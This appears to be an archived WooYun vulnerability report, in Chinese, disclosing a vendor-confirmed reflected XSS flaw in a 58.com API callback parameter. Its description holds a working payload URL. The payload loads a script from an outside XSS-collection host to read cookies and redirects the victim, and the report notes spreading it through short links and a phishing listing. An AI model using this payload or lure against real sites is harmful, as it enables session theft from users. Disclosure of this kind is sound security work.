当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044217

漏洞标题:58同城反射型xss一枚

相关厂商:58同城

漏洞作者: noob

提交时间:2013-11-27 16:14

修复时间:2014-01-11 16:14

公开时间:2014-01-11 16:14

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-27: 细节已通知厂商并且等待厂商处理中
2013-11-27: 厂商已经确认,细节仅向厂商公开
2013-12-07: 细节向核心白帽子及相关领域专家公开
2013-12-17: 细节向普通白帽子公开
2013-12-27: 细节向实习白帽子公开
2014-01-11: 细节向公众公开

简要描述:

反射型xss一枚

详细说明:

水平有限,只能让firefox支持读取cookie。
http://api.58.com/enterprise/?api_phone=&callback=<script src="http://xss1net.sinaapp.com/FI8Ron?1385537072"></script><script>window.setTimeout(function(){location.href='http://www.58.com'},5000);</script><!--&api_size=50
生成短链接:http://126.am/N7Azt0,到各个频道发布诱人消息。

n_s12010772282032154136.jpg


2.png

漏洞证明:

n_s12010772282032154136.jpg


2.png

修复方案:

你们更懂

版权声明:转载请注明来源 noob@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-11-27 16:42

厂商回复:

感谢对58同城安全的关注,确认是反射型xss漏洞,会尽快修复处理,
谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-27 16:41 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    @xsser 第一张图发错了,不好意思,可以改吗?

  2. 2013-11-27 16:42 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    钓鱼地址:sh.58.com/zufang/16068886405512x.shtml

  3. 2013-11-27 16:43 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    真快。。。

  4. 2014-02-20 11:38 | wusuopubupt ( 路人 | Rank:3 漏洞数:2 | BUPTer, linux lover.)

    MARK~